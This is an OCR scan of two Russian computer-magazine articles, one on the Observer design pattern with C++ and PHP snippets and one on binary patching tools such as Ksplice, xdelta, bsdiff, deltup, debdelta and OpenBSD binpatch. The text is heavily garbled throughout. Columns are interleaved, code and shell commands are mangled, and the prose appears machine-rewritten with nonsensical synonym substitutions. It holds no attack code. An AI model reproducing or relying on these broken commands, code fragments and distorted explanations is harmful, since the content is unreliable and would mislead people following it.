Е сли твоя милость выписываешь н аш журнал, так тебе сделано наслышан основа работы

_}

паттерна « Н аблюдатель>>. Его организм ахти вернее всего возьми п од п иску нате

}

update()
Observer из_s_писк"а,__________

прессу, всего лишь на качестве издательства на мире паттернов выступает

субъект, рассылающий опо во е щ ения об изменении состоя ни аз многогрешный чего­

class CpuTemp()

либо, а читателями являются наблюдатели, которые регистрируются у

{

субъекта с целью получения сооб щений с н его .

puЫi c:

puЫic

Observer

В процессеработы н аб людат е ли могут вроде с 3 сываться ото что до по части ­
вещ е ни й, приблизительно равным образом опять-таки для них подписываться. Субъектбудет безотказно

void JJRdatg_(fLQ.<!1__t_ cpu, float t_gJlli, int s_!нbl)

р ас ыл ать во сем клиентам сооб щ е ния об изменениях во системе. Таки м

{

01

образом, гл ав н ую положение на паттерн е будут игратьдва интерфейса: интер­

код, обрабатывающий информацию через

Systeminfo

фейс субъек т а, рассылающего опо на е щ ения, т. е .

Subject, равным образом интерфейс
наблюдателя, принимающего сии насчёт сообразно веще ния , т. е. ОЬsегvег. Subj ect

будетописывать мето ды п что касается дп иски равно ото п иски нате события, а тоже ме­

в таком случае д , что касается п овещающий наблюдателей об изменениях . ОЬsегvегописывает

LL

Реализация классов

единственный еди н ствен ны й средство - принимающий информацию относительно т объек т а.

01

подобна реализации

ПРИМЕНЯЕМ ПАТТЕРН
Ит ак , я еще з н аем по от т аточно, так чтобы видоизменить адрес нашей пр ог рамм ы

GpuTemR
CpuTemp

равным образом

HddSR""e""e""
d_ _ _ _ _ _ _ _ __

Реализация методов гegisteгObseгveгll да гemoveObseгveгll до­
вольна тривиаль н а, п отому во примере, приве д енном выш е, автор только

равно прив ести его для пр авильному виду. Для азбука по отношению пиш ем интерфейсы

обошлись комментариями. Самое простое, что такое? позволительно вытворять , - эт насчёт

Subj ect да ОЬsегvег.

присовокуплять да удалятьссылки получай объекты на конгломерат другими словами который-нибудь

010

ХАКЕР

00/153/2011

pcote ct@d

Выносим пе~даваемые материал во от.а.ельную структуру_ _ _ _ __

"acyOb зerverз Arcey ;

il.r:..i.!.c t SIDali.........._______...........- - - ·. -·---.... -·---------------puЬli c

function __ con5t~uct (

____ _______

{

•зtrEшai l Addceзз

"

_ float_t_cpu; _ __
"thiз - > зtrEшailAddceзз

~

"thi~ - > a~yoь~ecverзAccay

"зtcEaailAdd~eзз ;

=

ассау (

ассау ()

_fl oat t_gpu;
_irl t s_h_dd;

);

} _ __

p_u_Ыic :_ _

pUЬlic

tunc&ion

getEmailAddreээ ()

_fL.a.Q!!QllliJП_elll>Ш>Le.мeJ..O.liЫ .а.ля запроса конкретных.да!:!.!ii>!Х... _ _ __

return

_ flм :Lg~.C.p_Yieт_p_o_;______________________ _
___.f)Qgt_getGpuTemp_(_)_;_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

~thiэ - > эtr Em eil Addr eээ ;

_iл t getHddSpeed();
function velidate ()

puЬlic

0.f ( pc eg_match (

0

/ ""[a-zA-Z] [ \ w\

по части

-]•(a-zA-Z0 - 0]@

0

}_ __

что до

" [ a -zA-Z0-9)( \ W\o-)•[a-zA-Z0-9) \ o[a-zA-Z][a-zA-Z\.J•[a-zA-Z)" / " ,
jf th i s -> зtcEmai1.Add:&:e:зз

ithis ~> fice:E v e:nt (

)

)

Emai1.Va1.idator : : EVENТ_EНAIL_VALID

~-

Observer(),_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

{____________________________________
);

p_u_bl.ic : _ _
_y oid update(SIData *daj:a=NULL)...=е ;

е:lзе:

}_

--

Observer_ _ _ _ _" _________
___________________
_

~Q1uTemp_(_)_ _; _p,y..Ь1i~

РНР-реалиэация паттерна

{

pШ>lic

0ТL-список. notifyObseгveгsll да хорош делать из сим списком,

перебирая соответственно очереди его простейшие положения да вызывая updatell .
В конструкторы классов , реализующих интерфейс ОЬsегvег, ты да я
передаем ссылку бери мира 0ystemlпfo, с тем держать возможностьдо­
бавляться да отгоняться изо очереди нотификации.

:_ _ _ _ __

01 ...
void update(SIDaj:a *data)

_ {

_____if ..(9itl.i! ."::JJUL_L) ........- . ---..................___...._. _______"________"_______......
__J _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

Такая искусство позволяетсвести обусловленность междусубъек­
томик да наблюдателями для минимуму. Всё, аюшки? знает 0ystemlпfo что касается своих

}

клиентских модулях, зто то, почто они реализуют интерфейс ОЬsегvег.

/1

код, обрабатывающий информацию насчёт т Systemiпfo

Если численность сих модулей увеличится, нам далеко не придется падать во

кoд5ystemlпfo . Более того, да мы от тобой можем вноситьлюбые изменения во
субчик равно наблюдателей, перед тех пор nока их интерфейсы остаются не­

изменны . Но быть всех плюсах у данной реализации паттерна « Наблю­

U~~illLКa~~~G p~~~p~eм__ _ _ _ _ _ __

донор » естьинедостатки.

L/

Основной проблемой на нашем примере является то, который клиентские

щие ОЬsегvег, обязаны на своем конструкторе допускать на качестве

подоб~ ~ ~ализаци равным образом

CpuJe.mp_ _ _ _ _ __

Осталась единаче одна небольшая проблемка-классы, реализую-

модули получают чрезмерно счета ненужной информации с 0ystemlпfo.

параметра ссылку держи объект, реализующий интерфейс 0ubject. Но сия

Например, классу GpuTemp нужно видеть исключительно температуру держи чипе

неволя нигде неграмотный прописана возьми уровне интерфейса, который означает,

видеока рты, а быстрота HDD да прочее ему малограмотный нужно.

почто во каком-нибудь с будущих клиентских модулей ты да я обязательноза­

Очень бок о бок связан не без; сим обстоятельством да разный минус- коллекция

будем накадить конструктор, принимающий эту ссылку. В С++ автор сих строк можем

данных, передаваемых во качестве параметров во функцию updatell,

маленечко схитрить, воспользовавшись возможностью множественного

является фиксированным . Т. е . кабы 0ystemlпfo начнет уделять

наследованиявполнойстепениипеределавинтерфейсвполноцен-

единаче единолично субчик данных, примем поспешность чтения/записи 050-диска,

ный метафизический класс. То лакомиться создадим конструктордля ОЬsегvег"а,

ведь нам придется превращать интерфейс ОЬsегvег, а следовательно,

какой будетприниматьссылку нате 0ubject. В этом случае всемдочерним

да реализацию метода updatell закачаешься всех классах, наследующих текущий

классам придется как после ни крути допускать во своем конструкторетуже

интерфейс. Также нам придется подравнять адрес пotifyObseгveгsll. Это

ссылку получай 0ubject.

совершенно -не то, зачем наш брат хотим добиться, используя паттерны программи­
рования.

Для решения этихдвух nроблем пристало сформировать особый разряд

В других языка программирования, запрещающих множественное

юниорат равно конструкторы у интерфейсов , придется во ОЬsегvег "е
очерчивать разобщенный методдля получения ссылки для объект, реа­

иначе структуру !кому на правах пуще нравится] с целью хранения п ередавае­

лизующий 0ubject, равно требовать данный путь независимо еще по прошествии

мых данных. Метод updatell бросьте зачислять приобретать индикатор нате эту структу­

создания клиентского модуля.

ру во качестве дружка метра . Это позволит нам на будущем легко
трансформировать численность да образец передаваемой клиентским модулям

ЗАКЛ Ю ЧЕНИЕ

информации. Более того, наш брат сможем подавать неопытный индикатор

Мы узнали до этих пор об одном паттерне 00-программирования, который,

бери структуру данных, почто короче означать, что-нибудь используется имитация из

у места говоря, используется вдоволь многократно на современном софтостро­

запросом данных, т. е. клиентские модули на этом случае будутсами

ении. В следующих выпусках пишущий сии строки продолжим курить фимиам не без; через паттер­

заламывать интересующую их информацию y5ystemlпfo.

так в, а доколь советую позаимствовать близкий мозгчем-нибудьумным да полезным . :Х::

ХАКЕР

00 / 053/ 0011

011

UNIXOID

Евгеня Зобнин l exec Ьit . rul

ЗАЧЕМ НУЖНЫ БИНАРНЫЕ ПАТЧИ,
И КАК ИМИ ПОЛЬЗОВАТЬСЯ
В никсах безвыгодный обычай использо­
вать бинарные патчи . Обычно

обновления распространяются во
виде движение кетов, тарболлов вместе с исход­
никамиили текстовых файлов,

созданных утилитой

diff. Тем

малограмотный

менее, настроив свою систему получи и распишись

корректировка из через бинарных
патчей, твоя милость сможешь существен­
только поэкономить эпоха равно пробка да
аж отступиться с перезагрузки

быть обновлении ядра .

-

gоо.gi/Ма081 исходныйкодпо·
следней публичной
версии Ksplice.

Debdelta имеет

этой статье ты да я рассмотрим четыр е механизма создания

би н ар ны х патчей равно поговорим в рассуждении назначении каждого изо них.
В первой части статьи ваш покорный слуга расскажу что до Ksplice -технологии,
способной доставить uptime сервера накануне 000 %, дале пишущий сии строки поговорим об
инструментах

xdelta равным образом bsdiff, от через которых позволительно вежливо

сохранить сверху трафике быть обновлении системы , на третьей части
уделим первый план механизму

deltup, хозяйство трафика присутствие использо­

вании которого может достигнуть 05 %. Четвертая дробь п освящена

опцию " ·-delta-algo",

фреймварку Ьiпpatchпg, предназначенному интересах соз д ания движение кетов от

вместе с через которой

патчами про базовой инсталляции OpeпBSD на домашних условиях.

допускается означить пред­
почитаемуюути­

литудлясоздания

патчей.Доступные
варианты:хdеltа ,
xdelta-bzip, xdeltaЗ
равным образом

bsdiff.

Работу по мнению на­

писанию Makefile
интересах Ьiпpatchпg
не грех всецело
автоматизировать,
разве воспользо­

ватьсяскриптом,

опубликованным

IЩtiQIN!I
Наверное, в отношении Ksplice равным образом его недавней покупке компанией Огасlе не без; лы­

шали все. Этотакой двоедушный машина lилидаже, выгодно отличается сказать, хакl,
кой п озволяет н акатыват ь об н овле н ия н а стержень Liпu x н а лету, безграмотный
требуя перезагрузки механизмы либо ажно какой-то работы сообразно сборке
модулей ядра.

Механизм Ksplice использует порядком захватывающий отсадка пат­
план га ядра , во основе которого лежиттехника изменения компонентов

ядра лично изумительный промежуток времени его работы. Делается сие на двоечка шага. Н а первом

этапеотрабатывае т утилитагене рации бинар н ого патч а,которая

на дискуссионном

п олучает возьми сени месторасположе ни е исходных текстов Liпu х-ядра да

листе OpeпBSD I!I!!J!,

файл, обеспечивающий не блещущий новизной патч бери материнский адрес на diff-фopмaтe .

!IILEY.ШI .

Наложив этотпатч получай ис х одники, обслуживающая программа компилирует косточка , сравни­

вает получившийся икона из ядром предыдущей версии да генерирует

012

ХАКЕР

00 / 053/ 0011

Раз заплатка. двазаплатка

==-

. tl - ...,... .... ~--"=·

часть ядра, заключающий измененные части, а если бы конкретнее- адрес
измененных функций. Этот патч-модуль передается сверху машину, главное
которой надо бытовать обновлено. На втором этапе во деяние вступает
узел ядра

ksplice.ko,

ls tbe Op(!nBSD 0.8 release епаlа & patch lls l:

r

!

fot OerpВ"iQ !!11ф l!tм" i""xМm elrw a:fn hac

каковой сообща со патч-модулем загружается

во стержень целевой машины. После загрузки

ТЫs

~

ksplice.ko анализирует патч­

модульнапредметналичияновыхверсийфункцийядраиизменяет

yqg gw а! Н! fct<;\ а W" G!c F!!l!tlini• а!!

Фr fol lqwj•pf!фn, Тllitlilr

it llpdaltd Ollf:C 0 dly.

адреса настоящих функций ядра, в такой мере ради они указывали держи функ­
ции, содержащиеся на патч-модуле. Таким образом удается видоизменить
ядро, невыгодный перекомпилируя его.

Alltvcllll«lиrn

A К!!1rИ

W<k "*" ni• !!!"hicl! raв4in о., problea

SECt:RIП" ПХ : "" "• "" 06,20 01 Lml.-,ndilllllrdlll«t!lnS
PFПIIroo.pКifrШ!addret.1~(c .J-" I O. I . I , I · I O. I . I .S")"~e-corтectlyhaDdl tdoe1inl~in•)"Sit~U (alpU.ВIDIIbl, 0ml,i)86,atips64rl,
>"а"). 0\Ьсr loddress ~-ри {Ьаrе IМidren... "10.1.1. 0" aьdP<!"fi•~•" I O. J . J . I /JO").uiiOIIffe.:led.
А 05!1!!"SC ямk PI!SII gj111 w\ljch rQQCdjc• Фа• oroЫm.

• Oot:

обновления, затрагивающие куча функций, добавляющие
свежий функционал равным образом изменяющие внутренние структуры ядра, таким

• 0108: SEttRm" ПХ: """" ""У 01. 00 01 All ardtll«hlr~
А1 i~~eorno;llyЬЧ1811Cd cticatНello~IIIUNp aNidcauк()pcaSSLID!*Иpui.Кtlld.oflhr-.. Alllltld;erN~~IdllИ dlis f11w 00
lriiiCf .. ~.. lidm=oryt~CЦN,e-U.•~of•appltc.tioaliatfd 00i)pNSSL.. A.t ,...,11., ~"J"PPiQitioaln8)"Щ"Die~-ofp8fN"d
OCSP e~~IC:Мiou. spкifitally IW OCSP- n~et~~ioD.

Ksplice отмечает достаточ­

однако высокую действенность системы, возлюбленная смогла на совсем автома­

тическом режиме построить 04

001 0

~llf-

ради исправления небольших ошибок равно латания дыр, сильнее крупные

образом безграмотный сделаешь. Тем отнюдь не меньше виновник

O IO : R.ELIA.8 0 LrrY П.~ : F ...... aryl6,

Т\e till:!) dri•·trlll8)"hмd0\·tr.calrrill8dumple>rttotheilard>o..-eifdre~1~dкi~to~~llfifdleu.m.._don~

Минус такого подхода на том, что-то реально некто подходиттолько

ApplklliDIII~reolllyalf~IC"dir~кtulaerv«andeaiiSSL_CТX_o.e!_tl~_-_eboodwi«Vef"sSSL_CТX. I!il~lievcddi.IIIDIIIia,indle
!ми OS 011n lhis.
hapd ..caneclllliqthil i• v:U.J; dli1 i1 IIC"II"CC" th. сМ \"eflioa ia pom.
А М!JifS"
-~ njtJ! "ik)l! •cwdjn lhi1 !!l"оЬiщ.

% патчей про Ьugfiх-обновлений

Fmk

ядра, выпущенных вслед три года. Для остальных обновлений пришлось

насчёт

00 0:

AJ-•

RJ:LI,\BILIП"

J1."(: J aa aa.,• 0.3. 001 0 All aиhil«lura

"P..J"I"O"OCOI in RТМ_DЕLЕТЕ -s;,.fel" -td «~e~18ill p:rЬqor >-.lurtle.diii!ICI ~ IOCkt"luкn 0Ьм rntria СЬ. Af (llldl м o.prd) 0101 t«iq uy

немногопоработать руками.

К сожалению, во

0009 г.• в дальнейшем открытия компании Ksplice lпс.,

составитель решил затянуть адрес системы, малограмотный позволив частным лицам равно сто­

Перечень критическихобновлений ради OpenBSD 0.8

ронним компаниям самим порождать Кsрliсе-патчи. Поэтому на этой
статье автор малограмотный будем взвешивать этутему равным образом рассмотрим проблема лишь

которые дистрибутивы позволяют <<встроить >> утилиты с целью накла­

вместе с клиентской точки зрения. А выглядит возлюбленная так: пока

дывания бинарных патчей во упаковочный администратор , круглым счетом что, исправив

Ksplice

принадлежит Огасlе, которая продолжает выделять служба

сумме пару-тройку конфигов, позволительно прямо находиться да веселиться

вовсе даром го онлайн-обновле ни автор этих строк ядра для того дистрибутивов

быстрымиапдейтами.

Ubuпtu да Fedoгa, а и на собственного варианта

званием UпЬгеаkаЫе

Для того с целью конструкция инкрементальных апдейтов заработал ,

RHEL почти на­

Linux. Пользователи всех остальных корпора­

нужно составлять выполненотри условия. Во-первых, стопочный менед­

жер дистрибутива обязан подкреплять работу вместе с утилитой инкре­

тивных дистрибутивовпролетают
Теперь от м, равно как сим пользоваться. Для

Ubuntu

равным образом Fedoгa в сайте

ментальнога апдейта. Такая подмога принимать во растап с Aгchlinux

ksplice .com лакомиться пакет, его должно со пошатывать равным образом найти стандарт­

равно сквозь установку дополнительного танцевальный шаг кета

ными средствами:

Во-вторых, долженствует иметься не без; п ециальный dеltа-репозиторий,

debdelta,

во DeЬian.

тот или другой будетотвечать вслед укрытие патчей для шаг кета м да своевремен­

$ sudo apt-get iпstall curl
$ sudo dpkg -i ksplice- uptrack.deb

же вызывать новые патчи для того обновлений . Такие серверы заурядно

держат энтузиасты, оттого как правило их достаточно тяжко найти, а неравно

найдешь, шишка на ровном месте невыгодный даст гарантии, в чем дело? будущее сервер невыгодный исчезнет [это
Далее соглашаемся от лицензией. Появится пространство со списком всех
доступных ради нашего ядра обновлений. Нажимаем кнопку

lnstall,

да

режим со качает нужные патчи изо Сети да загрузит их во ядро. Чтобы на

главная невзгодье бинарных патчейl. И в-третьих, во кэш е пакетного ме­
неджера всякий раз должны покоиться закэшированные закачаешься момент предыду­

щей установки пакеты, получи и распишись которые как бы в один из дней равным образом будут взгромождаться

случае перезагрузки патч-модули были загружены, совместно не без; пакетом

патчи. Это видный момент, беспричинно во вкусе многие изо нас [и мы на фолиант числе!

устанавливается начальный скрипт. Система ввек следит вслед за обнов­

любят промежуток времени ото времени таковой кэш подчищать [однако пользу кого debdelta, что касается

лениям равным образом сообщает что касается них от через значка во трее.

котором наша сестра поговорим ниже, равно они отнюдь не нужны!.
Теперь касательно часть , по образу происходит установка nакетного менеджера:

XDE LTA, BSDIFF

В

Итак, не без;

версию

Ksp li ce да его извращенным по-под ходом ко накладыванию п атчей

ArchLinux всё решается конец nросто. Устанавливаем третью
xdelta:

разобрались, в настоящее время настало промежуток времени потолковать об утилитах, которые
позволяют приложить бинарныепатчина поодиночке взятые при­

$ sudo pacman -5

UN IX существует в качестве кого как минимум три таких инструмента:
сие старейшая исследование xdelta, выросшая с куска стих гsync,

xdeltaЗ

ложения. В

Открываем /etc/pacman.conf, снимаем значок комментария со

отвечающего вслед за инкрементальный бэкап, его сильнее современная да

строки UseDelta. Открываем инвентарь репозиториев /etc/pacmaп.d/

развитая модификация по-под названием xde lt aЗ равно

miггoгlist равным образом во самое его початок добавляем следующую строку :

bsdiff, разработанные для того

использования на ВSD-системах.

Посвоейсутивсетриинструментапредставляютсобойаналог
во всем нам известной программы

Server=http://delta .archlinux. fr/$repo/os/$arch

diff, тот или другой оперирует далеко не строками,

а последовательностью байт. Это дает осуществимость пускать в ход
утилиты далеко не толькодля расчеты разницы междуфайлами из

Сохраняем обложка да пробуем воплотить в жизнь полное подновление дис­
трибутива:

исходным кодом, же равно в целях любых других данных, будьтобинарник
приложения, tаг.gz-архив иначе аж видеофайл. Если тебе интересно,

$ sudo растап -Syu

вроде сие работает, так рекомендую составить себя понятие со статьей <<Дельта­

кодирование», опубликованной на Wikipedia [ гu . wik i ped i a . oгg/wiki/

Разница должна быть, ась? называется, налицо. Проблема только лишь на

д ельта - ко д ирование !, пишущий эти строки но паче расскажу насчёт том, на фигища всё зто

фолиант , аюшки? aгchlinux .fг охватывает дельты далече безвыгодный в целях всех батман кетов, но,

нужно равно в духе вместе с сим трудиться .

увы, альтернативы в этом месте просто-напросто нет.

Для ась? нужен двоичный

diff? Всё ахти просто: имея возмож­

В

Deblan сие делается до некоторой степени иначе. Существует специальная

ность класть бинарные п а тчин а ранее работающие прил ожения

обслуживающая программа [а точнее, коллекция утилит! подина названием debdelta, которая

иначе говоря целые архивы со исходниками, не возбраняется глубоко сберечь возьми

умеет исследовать dеЬ-пакеты в соответствии с косточкам, подсчитывать разницу среди

трафике. В нашем безлимитном мире расточительство трафика может равно малограмотный

файлами двух версий движение кетов со через

свершить нефралгия ш ой выгоды во денежном плане, хотя чисто пора сократит

новейший пакетик сверху основании сих данных. При накатывании п атчей сие

существенно, особенно присутствие крупных обновлениях всей системы . Не-

редкость используетуже установленные на систему пакеты, а ибо безвыгодный

ХАКЕР

00 /153/2011

xdelta да порождать

013

UNIXOID

002_getsockopt:

Сегодня крыша

kernel

deltup на Gentoo вкушать изо коробки, в свой черед не­

объезжаемый инструментарий был портирован умереть и никак не встать Fгее850 . Существует
малость больше не ведь — не то не так прочно работающих серверов, от­

00l_cvs:
cd ${~RKSRC} / gnu/u sr . b i n / cvs && \
(${ _obj_wrp} ; ${_build_wrp} )

вечающих ради генера ц ию равно отдачу dеltuр-патчей. Н астройка, ещё же,
совсем· безграмотный сложна:

В

Gentoo порядокде й ствий последующий . Устанавливаем инструмен­
de ltup равным образом getde lta:

твоя милость

003 sudo:
cd ${~RKSRC} /usr . b i n / sudo && \
(${ _obj} ; ${ _depend} ; ${ _build} J
004 libz :
cd ${ ~RKSRC} /li Ь/ l i bz && \
(${_obj} ; ${ _depend} ; ${_build) J
005 libz:
cd ${~RKSRC} / l i Ь/ l i bz && \
(${ _obj} ; ${_depend} ; ${ _build} )

$ sudo emerge deltup getdelta
Добавляем во /etc/make . coпf следующую строку:

$ sudo v i /etc/ make .conf
FETCHCOMMAN Q;"/usr/bin/getdel ta. sh \"\${URI}L..::.()
\" \${DISTDI R}1\${FI LE} \""
Так я сообщим emeгge по части том, почто хотим ис п ользовать команду

getdelta для того

п олучения архивов из исходниками. Д алее открываем

конфигурационный обложка /etc/de l tup/getdelta.гc равным образом п ишем тама сле­

00Б _ nat-t :

дующее:

cd ${~RKSRC} / sb i n /i sakmpd && \
(${ _obj} ; ${_depend} ; ${ _build} )

$ sudo v i /etc/deltup/getdel ta.rc

#

~nc l ude " bsd . Ьinpatch . mk "

0·""·"·€"A·"·"·IW1Ni$1Ad14-fil,,J.ICIФII

требует хране н ия старых версий танцевальный шаг кетов на кэш е

debde lta

#

Максимальная взгляды на очереди нате ож идание_Аельты

МAXIMUM_ACC EP TA~LE_QUEU EPQS; le

# Удалять_с.:r.а ые версии_фай .I]Q]L_
REMOVE_OLD_:oyes _ __

П равим Ьi npatc h Makefile

лишь на том, что-нибудь

0дgес локального gепозитоgия (если есть)

LOCAL MIRRQR;1.2 . 0 . 0

apt-get. П роблема
apt-get, а отчего

никоим образом безграмотный интегрируется вместе с

его нужно созывать автоматизированный п еред каждым обновлением сис т емы:

О п цию

LOCAL _ MIRROR

не запрещается неграмотный добавлять, об н а нужна лишь во фолиант

случае, даже если во локалке снедать Gепtоо - репозиторий, ко т орый не запрещается ис­

пользовать награду запроса патча с de l tup - cepвepa. Опция

ACCEPTA8LE_QUEUEP05 задает максимальную

MAXIMUM _

п озицию на очереди в

соз дание дельты. Большинство deltup-cepвepoв генерируют дельты

$_ sudo apt-get update
$ sudo debdelta-upgrade
$ sudo apt-get upgrade

нет слов времена первого обращения клиента после архивом, благодаря тому ряд вслед за
особотяжеловесными Приложениями равно последними обновлениями

Зато никак не нужно дерьмовый настройки равно возни из репазитариями
":""r-;::""17

[официальный репазитарий успешно работаетуже многие годы! . Сам

debdelta устанавливается приблизительно :

К Кspllce Uptra ck Ma nage r
А

$ sudo apt-get instal l d ~b_Щ!lta

New updates are avai l a Ы e.
"IOu сопение install them Ьу clicking "lnstallall updates• Ьelow.
Aval l aЫ e

Стоитсказать что касается т ом, который 050-аналог

xdelta подина названием bsdiff

l www . daemoпology.пet/bsdi ffi опять же имеет большое примене н ие. Он
был написан пользу кого утилиты обновления системы fгeebsd-update равным образом стал
частично базовой установки Fгее850 на

0005

делянка bspatchl , некоторый прямо обновляет систему не без; через би­
нарных патчей. Благодаря 050-лицензии, разрешающей вносить
ние да ради пределами

bsdiff получил большое распростране­

050 .

Oenial of service Ьу evading CPU time limits.

0

VGA console corrupts non-ASCII characte~.

Upcla~

Update

tD:

Ю:

pdfrn6qь

xoqc9vy4

CVE-2009-1337: kill the wrong сараЬiе(САР_КIЩ che<k.

0

Update ID: u.tollfa2

0

Update ID: hnci:JvhOe

0

ili§IIUQ

Update 00: с8u~и:ае

0

г. Каждый разок , нет-нет да и твоя милость

делаешь « fгeebsd-update iпstall >>, во деятельность вступает bsdiff [а точнее, его

адрес во закрытые приложения,

0

updates:

: SymЬotic link fllenames under ecryptfs сопение produce alarming wamings in dmesg.

CVE-2009- Uб5: lnteger overflow in the af_rose maximum user ffame size.
CVE-2009·1192: lnformation leak in the agp suЬsystem .
U~te

ID: ovnlqwxh

0 " Multiple Ьugs in filesystem core.

Интересную альтернативу бинарным патчам предложил во свое миг

одиночный изо поклонников дистрибутива, Geпtoo. Он создал утилитуdеltuр

[ deltup.souгcefoгge.пet l, коток орая брала двуха архива от исходникамиразных
версий приложения, распаковывала их, генерировала патч от через

Updatt!: ID: 019qlymc

erroneous memory overcommit in program start.
0 . Possible
Updatt!: 00: 0xocSqmo
regression in filesystem Ьuffer code.
0 ~. Performance
Update ID: cdoprpll

стандартного diff, у п аковывала его равно снабжала информацией, нужной
к получения малограмотный отличимого через оригинала архива от одной версией

приложения изо архива вместе с другой. Говоря для не без; тым языком, dе l tuр-файлом

Last checked: Sat jun 07 02:43:50 0009

0

позволено пропатчить тарболл из т арой версии программы, так чтобы унаследовать
тарболл не без; ее новой версией, избежав необходимости на загрузке итого

~

оригинального архива, а часто да

01 .-lnstallall updates 0

0t:lt~••• l

тарболла . Результаты работы утилиты оказались несложно поразитель­

ными : не очень размер deltup-пaтчa составляет только

~ СЬесk

Details

05 % через размера

0% [с этими цифрами не возбраняется ознако­

миться для странице статистики головного de l tup-cepвepa : goo.gl/letJU I.

Гла вное интервал клие н та

Ksplice

ХАКЕР

00/153/2011

Раз из-за пл атка . двазаплатка

09.08.2011 00:26
09.08.201119:31
09.08.201119:11
09.08.201119:05
09.08.201118:09
09.08.201118:04
09.08.201117:39
09.08.201117:32
09.08.201117:24

0. 04 kВ
026.38 kВ
0.54 kВ
08.30 kВ
085.62 kВ
06.66 kВ
03.05 kВ
054.01 kВ
053.00 во

09.08.201114:47
09.08.201113:26
09.08.201112:10
09.08.201112:09
09.08.201112:05
09.08.201111:57
09.08.201111:56

0.31

мв

08.74 kВ
048.95 kВ
0.98 мв
015.17 kВ
071.42 kВ
013.17 kВ

06.8% 015.00 kВ
09.4% 09.43 мв
04.4%
06.84 kВ
09.8% 07.60 мв
09.2% 02.49 мв
09.8% 09.27 мв
00.5% 003.66 kВ
09.6% 052.50 мв
02.1%
0.66 kВ

018.74 kВ
09.56 мв
01.38 kВ
07.65 мв
02.67 мв
09.33 мв
066.71 kВ
053.04 мв
00.49 kВ

04.54 мв 01.0%
0.83 мв
02.58 мв
06.79 мв
012.73 kВ
0.19 мв
069.45 kВ

03.24 мв

09.4 %
0.81 мв
04.2% 01.85 мв
08.2% 04.81 мв
02.1% 097.56 kВ
09.0%
0.73 мв
08.0% 056.28 kВ

09.08.201111:55

00.58

066.03

05.6%

09.08.201111:55

0.72

07.96

00.4%

06.24 kВ

01.91 kВ 03.6%
0.99 мв 09.4%

0.37 kВ
0.96 мв

04.54 kВ
05.31 kВ

09.08.201111:52
09.08.201111:52

025.45

О

gnupg-pkcs11-scd-O. 0.2. tar. bz2-gnupg-pkcs11-scd-O. 0.3. tar. bz2.dtu
wireshark-1.4. 0. tar. bz2-wireslыrk-1. 0. 0. tar. bz2. dn1
О bpy1hon-0.10. tar. gz-bpy!hon-0.10.1. tar. gz. dtu
О samba-3. 0.Orc3. tar. gz-samba-3. 0. О. tar.gz. dn1
О mysql-5. 0.14. tar. gz-mysql-5. 0.15. tar. gz. dtu
О samba-3. 0. 0. tar. gz-samba-3. 0.11. tar. gz. dn1
О parcellite-1. О. 0rc2. tar.gz-parcellite-1.0.2rc3. tar. gz. dtu
О cliromiпm-14. 0.835.18. tar. bz2-cliromiпm-14. 0.835.29. tar. bz2. dtu
О seednodes-20110731. fref. bz2-seednodes-20110808. fref. bz2. dtu
liппx-firmware-20110604. tar. bz2-liппx-firmware0
00110731. tar.bz2. dtu
О mercurial-1. 0. tar. gz-mercпrial-1. 0.1. tar. gz. dtu
О mediawik.i-1.16.1. tar.gz-mediawik.i-1.16. 0. tar. gz. dn1
О gtk+-2.20.1. tar. bz2-gtk+-2.24.4. tar. bz2.dtu
что до libXi-1.3.1. tar. bz2-libXi-1.4.3.tar. bz2.dnJ
О dejavu-fonts-ttf-2.31. tar. bz2-dejavu-foпts-ttf-2 . 02. tar. bz2.dtu
О xproto-7.0.18. tar. bz2-xproto-7.0.21. tar. bz2.dtu
opeпssh-5. 0р1 +х509-6. 0.3.diff. gz-openssh-5. 0р1 +х5090
0. 0. 0. diff. gz. dtu
О

0

opeпssl!-lpk-5 .4p1-0.3.1 0 . patcli.gz-opeпssh-lpk- 0 . 0р1-

0.3.13. patcl1. gz. dn1
О proftpd-mod-vroot-0.8. 0. tar. gz-proftpd-mod-vroot-0. 0. 0. tar. gz. dtu
О proftpd-1.3. 0с. tar. bz2-proftpd-1. 0. 0е. tar. bz2. dtu

Статистика по мнению размеру патчей, публикуемая в сайте iпux01.gwdg . de

может выстроиться большая. Нет каких-то определенных реком е н­

0. Д обави ть во обложка /etc/make.coп f со л е д ую щ ую от трок у:

даций в области поводу размера очере ди . что-то около вроде погрузка для сервер может
составлять разной да время, которое твоя милость можешь прождать, -тоже. Самостоя­

тельно ордонанс ывать какой-либо deltup-cepвep н е треб уется, ноне постоянно
серверы подключены ко liпux01.gwdg . de, какой вписан во

$ sudo vi /~make .conf
__fl TCH_CMD=/ usrLiocal Lbin / getdel ta. s~h..__ __

getdelta п по отношению
Теперь беспричинно оттого, используешь ли твоя милость систему портов на­

умолча нию.

Это всё, присутствие сле дующем обновлении батман кета твоя милость д олже н запоминать

дут пр оисходить со через deltup-cepвepa. Однако должен оказываться

разницу закачаешься вр емени скачивания.

Порт deltup питаться равным образом для того

прям ую сиречь отличаются как небо и земля фронт-знды будто poгtupgгade, обновления бу­

FreeBSD. Он неграмотный требует своего собственного

го т овым для тому, в чем дело? подчас

deltup ошибается да собирае т невыгодный вовсе

репазитария равным образом может эксплуатнуть deltup-cepвepa Geпtoo [все-таки

т оч н ую ко 14 ю а р хи ва , которая в корне нормальн об распаковывается,

исходники прило но ния с целью разных платформ одни да те но ) . Чт обы

только имеет непр ави льн ую контрольную сумму [ сие сле дстви е микро­

порекомендовать сис тем у портов FгeeBSD пускать в ход

различий на разных версиях gzip да bzip2). В этом случае сборку движение кета

deltup интересах

обновле­

ния софта, безвыгодный обходимо изготовить следующее:

0.

Ус т а новить

deltup

да

wget

дозволено осуществить, добавив пр ед число «пи» са ние

NO_CHECKSU М:

изо портов :

$ cd / usr / ports Lз.ys utils / deltu R._
____$ sudo ma~!!_install clean
_ $_ cd LusrL orts ftp f.!.jg,",_
et
",___ _ _ _ _ _ _ _ _ _ _ __

__$. sudo make install clean

$ cd / usr/ports/ga mes/cows ay
$ make NO_CHECKSUM install сlеап

OPENBSD BINPATCH
Еще безраздельно инструмент, касательно котором пишущий эти строки бы хотел раструбить на этом обзоре,
никак не имеетотношения для бинарным патчам в качестве кого таковым, так хорэ инте­

ресен да полезен владельцам колтун п насчёт в, работающих по-под управлением
что до п ерацион н ой системы OpeпBSD.

ШПАРГАЛКА ПО БИНАРНЫМ ПАТЧАМ

Все, который имеет хот ь малейшее демонстрация об процессевыпуска
